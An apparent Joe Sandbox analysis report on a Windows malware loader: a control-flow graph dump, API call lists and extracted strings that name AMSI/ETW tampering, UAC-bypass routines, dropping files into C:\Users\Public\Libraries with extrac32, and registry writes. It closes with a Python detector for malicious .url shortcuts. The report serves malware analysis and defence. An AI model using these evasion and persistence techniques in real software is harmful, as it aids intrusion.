85247 2de47b0 11 API calls 85246->85247 85248 2e05628 85247->85248 85249 2df7be8 17 API calls 85248->85249 85250 2e0564c 85249->85250 85251 2e06190 85250->85251 85252 2e05661 85250->85252 85254 2de4824 11 API calls 85251->85254 85253 2de4824 11 API calls 85252->85253 85256 2e05682 85253->85256 85255 2e061b1 85254->85255 85257 2de47b0 11 API calls 85255->85257 85258 2de47b0 11 API calls 85256->85258 85260 2e061e8 85257->85260 85259 2e056b9 85258->85259 85261 2df7be8 17 API calls 85259->85261 85262 2df7be8 17 API calls 85260->85262 85263 2e056dd 85261->85263 85264 2e0620c 85262->85264 85265 2de4824 11 API calls 85263->85265 85266 2de4824 11 API calls 85264->85266 85268 2e056fe 85265->85268 85267 2e0622d 85266->85267 85269 2de47b0 11 API calls 85267->85269 85270 2de47b0 11 API calls 85268->85270 85272 2e06264 85269->85272 85271 2e05735 85270->85271 85273 2df7be8 17 API calls 85271->85273 85274 2df7be8 17 API calls 85272->85274 85275 2e05759 85273->85275 85276 2e06288 85274->85276 85277 2de4824 11 API calls 85275->85277 85278 2de4824 11 API calls 85276->85278 85279 2e0577a 85277->85279 85280 2e062a9 85278->85280 85282 2de47b0 11 API calls 85279->85282 85281 2de47b0 11 API calls 85280->85281 85283 2e062e0 85281->85283 85284 2e057b1 85282->85284 85286 2df7be8 17 API calls 85283->85286 85285 2df7be8 17 API calls 85284->85285 85287 2e057d5 85285->85287 85288 2e06304 85286->85288 85289 2de47b0 11 API calls 85287->85289 85290 2de4824 11 API calls 85288->85290 85291 2e057ed 85289->85291 85294 2e06325 85290->85294 85292 2e057f8 WinExec 85291->85292 85293 2de4824 11 API calls 85292->85293 85296 2e0581f 85293->85296 85295 2de47b0 11 API calls 85294->85295 85297 2e0635c 85295->85297 85298 2de47b0 11 API calls 85296->85298 85299 2df7be8 17 API calls 85297->85299 85300 2e05856 85298->85300 85303 2e06380 85299->85303 85301 2df7be8 17 API calls 85300->85301 85304 2e0587a 85301->85304 85302 2e06b54 85305 2de4824 11 API calls 85302->85305 85303->85302 85306 2de4824 11 API calls 
85303->85306 85307 2de4824 11 API calls 85304->85307 85308 2e06b75 85305->85308 85309 2e063b6 85306->85309 85310 2e0589b 85307->85310 85311 2de47b0 11 API calls 85308->85311 85312 2de47b0 11 API calls 85309->85312 85313 2de47b0 11 API calls 85310->85313 85314 2e06bac 85311->85314 85315 2e063ed 85312->85315 85316 2e058d2 85313->85316 85317 2df7be8 17 API calls 85314->85317 85318 2df7be8 17 API calls 85315->85318 85319 2df7be8 17 API calls 85316->85319 85320 2e06bd0 85317->85320 85321 2e06411 85318->85321 85322 2e058f6 85319->85322 85323 2de4824 11 API calls 85320->85323 85324 2de4824 11 API calls 85321->85324 85325 2de4824 11 API calls 85322->85325 85326 2e06bf1 85323->85326 85327 2e06432 85324->85327 85328 2e05917 85325->85328 85329 2de47b0 11 API calls 85326->85329 85330 2de47b0 11 API calls 85327->85330 85331 2de47b0 11 API calls 85328->85331 85332 2e06c28 85329->85332 85333 2e06469 85330->85333 85334 2e0594e 85331->85334 85335 2df7be8 17 API calls 85332->85335 85336 2df7be8 17 API calls 85333->85336 85339 2df7be8 17 API calls 85334->85339 85337 2e06c4c 85335->85337 85338 2e0648d 85336->85338 85340 2de4824 11 API calls 85337->85340 85341 2de4824 11 API calls 85338->85341 85342 2e05972 85339->85342 85343 2e06c6d 85340->85343 85344 2e064ae 85341->85344 85909 2df9e70 29 API calls 85342->85909 85347 2de47b0 11 API calls 85343->85347 85348 2de47b0 11 API calls 85344->85348 85346 2e05999 85349 2de4824 11 API calls 85346->85349 85350 2e06ca4 85347->85350 85351 2e064e5 85348->85351 85352 2e059ba 85349->85352 85353 2df7be8 17 API calls 85350->85353 85354 2df7be8 17 API calls 85351->85354 85356 2de47b0 11 API calls 85352->85356 85363 2e06cc8 85353->85363 85355 2e06509 85354->85355 85357 2de4824 11 API calls 85355->85357 85359 2e059f1 85356->85359 85361 2e0652a 85357->85361 85358 2e074a8 85360 2de4824 11 API calls 85358->85360 85362 2df7be8 17 API calls 85359->85362 85368 2e074c9 85360->85368 85366 2de47b0 11 API calls 85361->85366 85364 2e05a15 85362->85364 85363->85358 
85365 2de4824 11 API calls 85363->85365 85367 2de4824 11 API calls 85364->85367 85370 2e06d13 85365->85370 85371 2e06561 85366->85371 85372 2e05a36 85367->85372 85369 2de47b0 11 API calls 85368->85369 85376 2e07500 85369->85376 85373 2de47b0 11 API calls 85370->85373 85374 2df7be8 17 API calls 85371->85374 85377 2de47b0 11 API calls 85372->85377 85380 2e06d4a 85373->85380 85375 2e06585 85374->85375 85378 2de4824 11 API calls 85375->85378 85379 2df7be8 17 API calls 85376->85379 85383 2e05a6d 85377->85383 85385 2e065a6 85378->85385 85381 2e07524 85379->85381 85384 2df7be8 17 API calls 85380->85384 85382 2de4824 11 API calls 85381->85382 85394 2e07545 85382->85394 85386 2df7be8 17 API calls 85383->85386 85387 2e06d6e 85384->85387 85390 2de47b0 11 API calls 85385->85390 85388 2e05a91 85386->85388 85389 2de4824 11 API calls 85387->85389 85391 2de4824 11 API calls 85388->85391 85392 2e06d8f 85389->85392 85393 2e065dd 85390->85393 85395 2e05ab2 85391->85395 85397 2de47b0 11 API calls 85392->85397 85398 2df7be8 17 API calls 85393->85398 85396 2de47b0 11 API calls 85394->85396 85399 2de47b0 11 API calls 85395->85399 85401 2e0757c 85396->85401 85404 2e06dc6 85397->85404 85400 2e06601 85398->85400 85407 2e05ae9 85399->85407 85402 2de4824 11 API calls 85400->85402 85403 2df7be8 17 API calls 85401->85403 85409 2e06622 85402->85409 85405 2e075a0 85403->85405 85408 2df7be8 17 API calls 85404->85408 85406 2de4824 11 API calls 85405->85406 85415 2e075c1 85406->85415 85411 2df7be8 17 API calls 85407->85411 85410 2e06dea 85408->85410 85413 2de47b0 11 API calls 85409->85413 85412 2de4824 11 API calls 85410->85412 85414 2e05b0d 85411->85414 85418 2e06e0b 85412->85418 85419 2e06659 85413->85419 85416 2de4824 11 API calls 85414->85416 85417 2de47b0 11 API calls 85415->85417 85422 2e05b4d 85416->85422 85424 2e075f8 85417->85424 85420 2de47b0 11 API calls 85418->85420 85421 2df7be8 17 API calls 85419->85421 85429 2e06e42 85420->85429 85423 2e0667d 85421->85423 85426 2de47b0 11 API calls 
85422->85426 85425 2de2ee0 2 API calls 85423->85425 85428 2df7be8 17 API calls 85424->85428 85427 2e06682 85425->85427 85434 2e05b84 85426->85434 85431 2de4824 11 API calls 85427->85431 85433 2e0761c 85428->85433 85430 2df7be8 17 API calls 85429->85430 85432 2e06e66 85430->85432 85440 2e066bb 85431->85440 85912 2dfd198 85432->85912 85437 2df7be8 17 API calls 85433->85437 85438 2df7be8 17 API calls 85434->85438 85444 2e0764f 85437->85444 85441 2e05ba8 85438->85441 85439 2de4824 11 API calls 85445 2e06eaa 85439->85445 85443 2de47b0 11 API calls 85440->85443 85442 2de4824 11 API calls 85441->85442 85446 2e05bc9 85442->85446 85449 2e066f2 85443->85449 85447 2df7be8 17 API calls 85444->85447 85448 2de4824 11 API calls 85445->85448 85450 2de47b0 11 API calls 85446->85450 85453 2e07682 85447->85453 85454 2e06ee2 85448->85454 85451 2df7be8 17 API calls 85449->85451 85457 2e05c00 85450->85457 85452 2e06716 85451->85452 85455 2de4824 11 API calls 85452->85455 85456 2df7be8 17 API calls 85453->85456 85458 2de47b0 11 API calls 85454->85458 85460 2e06737 85455->85460 85462 2e076b5 85456->85462 85459 2df7be8 17 API calls 85457->85459 85464 2e06f19 85458->85464 85461 2e05c24 85459->85461 85465 2de47b0 11 API calls 85460->85465 85463 2de4824 11 API calls 85461->85463 85466 2df7be8 17 API calls 85462->85466 85469 2e05c45 85463->85469 85467 2df7be8 17 API calls 85464->85467 85473 2e0676e 85465->85473 85468 2e076e8 85466->85468 85470 2e06f3d 85467->85470 85471 2de4824 11 API calls 85468->85471 85474 2de47b0 11 API calls 85469->85474 85472 2de4824 11 API calls 85470->85472 85477 2e07709 85471->85477 85478 2e06f5e 85472->85478 85475 2df7be8 17 API calls 85473->85475 85480 2e05c7c 85474->85480 85476 2e06792 85475->85476 85479 2de4824 11 API calls 85476->85479 85481 2de47b0 11 API calls 85477->85481 85482 2de47b0 11 API calls 85478->85482 85484 2e067b3 85479->85484 85483 2df7be8 17 API calls 85480->85483 85486 2e07740 85481->85486 85487 2e06f95 85482->85487 85485 2e05ca0 85483->85485 
85488 2de47b0 11 API calls 85484->85488 85910 2df5aa8 42 API calls 85485->85910 85490 2df7be8 17 API calls 85486->85490 85492 2df7be8 17 API calls 85487->85492 85498 2e067ea 85488->85498 85493 2e07764 85490->85493 85491 2e05ccc 85496 2de4b90 11 API calls 85491->85496 85494 2e06fb9 85492->85494 85495 2de4824 11 API calls 85493->85495 85919 2de7e18 85494->85919 85508 2e07785 85495->85508 85499 2e05ce1 85496->85499 85504 2df7be8 17 API calls 85498->85504 85501 2de4824 11 API calls 85499->85501 85512 2e05d02 85501->85512 85502 2e072a2 85507 2de4824 11 API calls 85502->85507 85503 2e06fcb 85505 2de4824 11 API calls 85503->85505 85506 2e0680e GetCurrentProcess 85504->85506 85514 2e06fec 85505->85514 85902 2df7968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 85506->85902 85515 2e072c3 85507->85515 85511 2de47b0 11 API calls 85508->85511 85510 2e06828 85513 2de4824 11 API calls 85510->85513 85518 2e077bc 85511->85518 85516 2de47b0 11 API calls 85512->85516 85520 2e0684e 85513->85520 85519 2de47b0 11 API calls 85514->85519 85517 2de47b0 11 API calls 85515->85517 85524 2e05d39 85516->85524 85526 2e072fa 85517->85526 85521 2df7be8 17 API calls 85518->85521 85525 2e07023 85519->85525 85522 2de47b0 11 API calls 85520->85522 85523 2e077e0 85521->85523 85533 2e06885 85522->85533 85527 2de4824 11 API calls 85523->85527 85528 2df7be8 17 API calls 85524->85528 85530 2df7be8 17 API calls 85525->85530 85531 2df7be8 17 API calls 85526->85531 85537 2e07801 85527->85537 85529 2e05d5d 85528->85529 85538 2de49bc 11 API calls 85529->85538 85532 2e07047 85530->85532 85534 2e0731e 85531->85534 85535 2de4824 11 API calls 85532->85535 85539 2df7be8 17 API calls 85533->85539 85536 2de4824 11 API calls 85534->85536 85545 2e07068 85535->85545 85546 2e0733f 85536->85546 85542 2de47b0 11 API calls 85537->85542 85540 2e05d7a RtlMoveMemory 85538->85540 85541 2e068a9 85539->85541 85543 2de4824 11 API calls 85540->85543 85544 2de4824 11 API calls 85541->85544 85549 2e07838 85542->85549 85550 
2e05da1 85543->85550 85551 2e068ca 85544->85551 85547 2de47b0 11 API calls 85545->85547 85548 2de47b0 11 API calls 85546->85548 85555 2e0709f 85547->85555 85556 2e07376 85548->85556 85552 2df7be8 17 API calls 85549->85552 85554 2de47b0 11 API calls 85550->85554 85553 2de47b0 11 API calls 85551->85553 85559 2e0785c 85552->85559 85562 2e06901 85553->85562 85560 2e05dd8 85554->85560 85557 2df7be8 17 API calls 85555->85557 85558 2df7be8 17 API calls 85556->85558 85561 2e070c3 85557->85561 85563 2e0739a 85558->85563 85566 2df7be8 17 API calls 85559->85566 85567 2df7be8 17 API calls 85560->85567 85564 2de4824 11 API calls 85561->85564 85568 2df7be8 17 API calls 85562->85568 85565 2de4824 11 API calls 85563->85565 85573 2e070e4 85564->85573 85574 2e073bb 85565->85574 85575 2e0788f 85566->85575 85569 2e05dfc 85567->85569 85570 2e06925 85568->85570 85571 2de4824 11 API calls 85569->85571 85572 2de4824 11 API calls 85570->85572 85579 2e05e1d 85571->85579 85580 2e06946 85572->85580 85576 2de47b0 11 API calls 85573->85576 85577 2de47b0 11 API calls 85574->85577 85578 2df7be8 17 API calls 85575->85578 85585 2e0711b 85576->85585 85583 2e073f2 85577->85583 85584 2e078c2 85578->85584 85581 2de47b0 11 API calls 85579->85581 85582 2de47b0 11 API calls 85580->85582 85592 2e05e54 85581->85592 85590 2e0697d 85582->85590 85587 2df7be8 17 API calls 85583->85587 85588 2df7be8 17 API calls 85584->85588 85586 2df7be8 17 API calls 85585->85586 85589 2e0713f 85586->85589 85591 2e07416 85587->85591 85601 2e078f5 85588->85601 85923 2dfc74c 85589->85923 85597 2df7be8 17 API calls 85590->85597 85594 2de4824 11 API calls 85591->85594 85595 2df7be8 17 API calls 85592->85595 85606 2e07437 85594->85606 85598 2e05e78 85595->85598 85600 2e069a1 85597->85600 85602 2de4824 11 API calls 85598->85602 85599 2de44f4 11 API calls 85603 2e07164 85599->85603 85903 2de49bc 85600->85903 85607 2df7be8 17 API calls 85601->85607 85610 2e05e99 85602->85610 85604 2de4824 11 API calls 85603->85604 85611 2e07185 
85604->85611 85609 2de47b0 11 API calls 85606->85609 85613 2e07928 85607->85613 85608 2e069c5 85612 2de4824 11 API calls 85608->85612 85616 2e0746e 85609->85616 85614 2de47b0 11 API calls 85610->85614 85615 2de47b0 11 API calls 85611->85615 85619 2e069f4 85612->85619 85617 2df7be8 17 API calls 85613->85617 85623 2e05ed0 85614->85623 85624 2e071bc 85615->85624 85620 2df7be8 17 API calls 85616->85620 85618 2e0795b 85617->85618 85621 2de4824 11 API calls 85618->85621 85625 2de47b0 11 API calls 85619->85625 85622 2e07492 85620->85622 85631 2e0797c 85621->85631 85626 2de49bc 11 API calls 85622->85626 85628 2df7be8 17 API calls 85623->85628 85629 2df7be8 17 API calls 85624->85629 85636 2e06a2b 85625->85636 85627 2e0749c 85626->85627 85943 2df7f48 35 API calls 85627->85943 85632 2e05ef4 85628->85632 85634 2e071e0 85629->85634 85637 2de47b0 11 API calls 85631->85637 85633 2de4824 11 API calls 85632->85633 85639 2e05f15 85633->85639 85635 2de4824 11 API calls 85634->85635 85641 2e07201 85635->85641 85638 2df7be8 17 API calls 85636->85638 85643 2e079b3 85637->85643 85640 2e06a4f 85638->85640 85644 2de47b0 11 API calls 85639->85644 85642 2de4824 11 API calls 85640->85642 85645 2de47b0 11 API calls 85641->85645 85648 2e06a70 85642->85648 85646 2df7be8 17 API calls 85643->85646 85650 2e05f4c 85644->85650 85652 2e07238 85645->85652 85647 2e079d7 85646->85647 85649 2de4824 11 API calls 85647->85649 85651 2de47b0 11 API calls 85648->85651 85655 2e079f8 85649->85655 85653 2df7be8 17 API calls 85650->85653 85658 2e06aa7 85651->85658 85654 2df7be8 17 API calls 85652->85654 85656 2e05f70 85653->85656 85665 2e0725c 85654->85665 85659 2de47b0 11 API calls 85655->85659 85911 2dfa1c0 51 API calls 85656->85911 85660 2df7be8 17 API calls 85658->85660 85664 2e07a2f 85659->85664 85662 2e06acb 85660->85662 85661 2e05f81 85663 2de4824 11 API calls 85662->85663 85668 2e06aec 85663->85668 85667 2df7be8 17 API calls 85664->85667 85928 2dfc3f8 85665->85928 85670 2e07a53 85667->85670 85669 2de47b0 
11 API calls 85668->85669 85673 2e06b23 85669->85673 85671 2df7be8 17 API calls 85670->85671 85672 2e07a86 85671->85672 85674 2de4824 11 API calls 85672->85674 85675 2df7be8 17 API calls 85673->85675 85677 2e07aa7 85674->85677 85676 2e06b47 EnumSystemLocalesA 85675->85676 85676->85302 85678 2de47b0 11 API calls 85677->85678 85679 2e07ade 85678->85679 85680 2df7be8 17 API calls 85679->85680 85681 2e07b02 85680->85681 85682 2de4824 11 API calls 85681->85682 85683 2e07b23 85682->85683 85684 2de47b0 11 API calls 85683->85684 85685 2e07b5a 85684->85685 85686 2df7be8 17 API calls 85685->85686 85687 2e07b7e 85686->85687 85688 2de4824 11 API calls 85687->85688 85689 2e07b9f 85688->85689 85690 2de47b0 11 API calls 85689->85690 85691 2e07bd6 85690->85691 85692 2df7be8 17 API calls 85691->85692 85693 2e07bfa 85692->85693 85694 2df7be8 17 API calls 85693->85694 85695 2e07c2d 85694->85695 85696 2df7be8 17 API calls 85695->85696 85697 2e07c60 85696->85697 85698 2df7be8 17 API calls 85697->85698 85699 2e07c93 85698->85699 85700 2df7be8 17 API calls 85699->85700 85701 2e07cc6 85700->85701 85702 2de4824 11 API calls 85701->85702 85703 2e07ce7 85702->85703 85704 2de47b0 11 API calls 85703->85704 85705 2e07d1e 85704->85705 85706 2df7be8 17 API calls 85705->85706 85707 2e07d42 85706->85707 85708 2de4824 11 API calls 85707->85708 85709 2e07d63 85708->85709 85710 2de47b0 11 API calls 85709->85710 85711 2e07d9a 85710->85711 85712 2df7be8 17 API calls 85711->85712 85713 2e07dbe 85712->85713 85714 2df7be8 17 API calls 85713->85714 85715 2e07df1 85714->85715 85716 2df7be8 17 API calls 85715->85716 85717 2e07e24 85716->85717 85718 2df7be8 17 API calls 85717->85718 85719 2e07e57 85718->85719 85720 2df7be8 17 API calls 85719->85720 85721 2e07e8a 85720->85721 85722 2df7be8 17 API calls 85721->85722 85723 2e07ebd 85722->85723 85724 2de4824 11 API calls 85723->85724 85725 2e07ede 85724->85725 85726 2de47b0 11 API calls 85725->85726 85727 2e07f15 85726->85727 85728 2df7be8 17 API calls 
Control-flow graph edge list (tail of the rendered graph for the function ending at 2e08b96; the graph image itself is not preserved). Call structure recoverable from the edges:
• Main body 2e07f39 .. 2e08b94: a straight-line sequence that repeats the triple 2de4824 (11 API calls), 2de47b0 (11 API calls), 2df7be8 (17 API calls; the LoadLibraryW/GetModuleHandleW/GetProcAddress resolver listed under APIs below), with long runs of back-to-back 2df7be8 calls, and ends at 2e08b94 with ExitProcess.
• 2dfd32f: RegOpenKeyA -> 2de49bc -> RegSetValueExA, RegCloseKey -> 2de44c4 -> 2de44a0 (a registry value write).
• 2dfc40e: 2de4ee4 -> RtlDosPathNameToNtPathName_U -> 2dfc340 -> NtCreateFile -> 2de49bc -> NtWriteFile, NtClose -> 2de4c24 -> 2de44a0 (a file written through the native NT calls rather than CreateFile/WriteFile).
• 2de7e22: GetFileAttributesA (existence check whose result selects the next block).
• 2dfd1bd: 2de4688 / 2de44f4 (11 API calls each) -> 2de44a0.
• 2dfc764: loop over 2de4b90 / 2de49bc (11 API calls each).
• 2de4ee4, 2de4bf4, 2de4c14, 2de4c24, 2de4c60: SysAllocStringLen, SysFreeString and SysReAllocStringLen wrappers (BSTR string helpers used throughout).
                                                                                                                                                    APIs
                                                                                                                                                    • InetIsOffline.URL(00000000,00000000,02E08FB6,?,?,?,00000000,00000000), ref: 02DFD604
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                      • Part of subcall function 02DE7E18: GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
                                                                                                                                                      • Part of subcall function 02DEC320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E455F0,?,02DFE40F,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,OpenSession), ref: 02DEC337
                                                                                                                                                      • Part of subcall function 02DFC4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC517
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC547
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DFC55C
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DFC588
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DFC591
                                                                                                                                                      • Part of subcall function 02DE7E3C: GetFileAttributesA.KERNEL32(00000000,?,02E01133,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,ScanString), ref: 02DE7E47
                                                                                                                                                      • Part of subcall function 02DE8004: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E01324,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,Initialize,02E45344,02E08FEC,ScanString,02E45344,02E08FEC), ref: 02DE8011
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                                                    • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                    • API String ID: 2725267379-582383607
                                                                                                                                                    • Opcode ID: c34cbd7f604b5dcbb0c0123b4e7d0810f1bf529b18022008a3ef3fb092333aac
                                                                                                                                                    • Instruction ID: afb9984635c0a19db7822fba2bdade577ef4670b758fd870875bcf647d710abf
                                                                                                                                                    • Opcode Fuzzy Hash: c34cbd7f604b5dcbb0c0123b4e7d0810f1bf529b18022008a3ef3fb092333aac
                                                                                                                                                    • Instruction Fuzzy Hash: 1304D834A902588BDF10FB65DC80ADE73B7EB85700F5095E5A50AAB354DB70AEC2CF64
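The String ID list above contains the pieces of a Windows Internet Shortcut ([InternetShortcut], URL=file:", IconIndex=, HotKey=, .url) next to the drop folder C:\Users\Public\Libraries\ and an extrac32.exe /C /Y copy command, which is consistent with the loader writing a .url file whose file: target points into that folder. The following is an added example, not code from the sample or from Joe Sandbox: a parser for .url files that normalises the file: URL forms Windows accepts and flags targets under C:\Users\Public with an executable extension. The shortcut text inside it is constructed to match the fragments in the string list; the file name Placeholder.pif and its extension are assumptions, not values taken from the report.

```python
"""Parse Internet Shortcut (.url) files and flag file: targets under C:\\Users\\Public.

Added example; not code from the analysed sample or from the Joe Sandbox report.
"""
import ntpath
import re
from urllib.parse import unquote

# Constructed sample in the style the report's strings suggest: the section name,
# a quoted file: URL, IconIndex= and HotKey= lines. The file name is a placeholder.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    'URL=file:"C:\\Users\\Public\\Libraries\\Placeholder.pif"\r\n'
    "IconIndex=13\r\n"
    "HotKey=0\r\n"
)

# C:\Users\Public is writable by every local user, so a file: target there is
# the same kind of signal as a Run key pointing into that folder.
SUSPICIOUS_ROOTS = ("c:\\users\\public\\",)
EXECUTABLE_EXT = {".pif", ".scr", ".com", ".cmd", ".bat", ".exe", ".vbs", ".js", ".hta"}


def parse_internet_shortcut(text):
    """Return the key/value map of the [InternetShortcut] section (keys lower-cased)."""
    section = None
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def file_url_to_path(url):
    """Turn file:"C:\\x", file:///C:/x, file:/C:/x or file:C:\\x into a Windows path, else None."""
    m = re.match(r'(?i)^file:(?://)?(?:/)?"?(.*?)"?$', url.strip())
    if not m:
        return None
    return unquote(m.group(1)).replace("/", "\\")


def assess_shortcut(text):
    """Return (target_path, reasons); reasons is empty for a benign-looking shortcut."""
    values = parse_internet_shortcut(text)
    target = file_url_to_path(values.get("url", ""))
    reasons = []
    if target is None:
        return None, reasons
    low = target.lower()
    if low.startswith(SUSPICIOUS_ROOTS):
        reasons.append("file: target under C:\\Users\\Public")
    if ntpath.splitext(low)[1] in EXECUTABLE_EXT:
        reasons.append("file: target has an executable extension")
    if values.get("url", "").lower().startswith('file:"'):
        reasons.append('non-standard quoted file:" form')
    return target, reasons


if __name__ == "__main__":
    print(assess_shortcut(SAMPLE_URL_FILE))
```

assess_shortcut returns the resolved target together with the reasons so a hunt over a Startup or Public folder can report why each .url was flagged; a shortcut with an http(s) URL yields (None, []) because only file: targets are of interest here.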
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB65
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CB6E
                                                                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB85
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CB88
                                                                                                                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CB9A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CB9D
                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CBAE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBB1
                                                                                                                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1568E9E1), ref: 1569CBC3
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBC6
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1568E9E1), ref: 1569CBD2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBD5
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1568E9E1), ref: 1569CBE6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBE9
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1568E9E1), ref: 1569CBFA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBFD
                                                                                                                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1568E9E1), ref: 1569CC0E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC11
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1568E9E1), ref: 1569CC22
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC25
                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1568E9E1), ref: 1569CC36
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC39
                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1568E9E1), ref: 1569CC4A
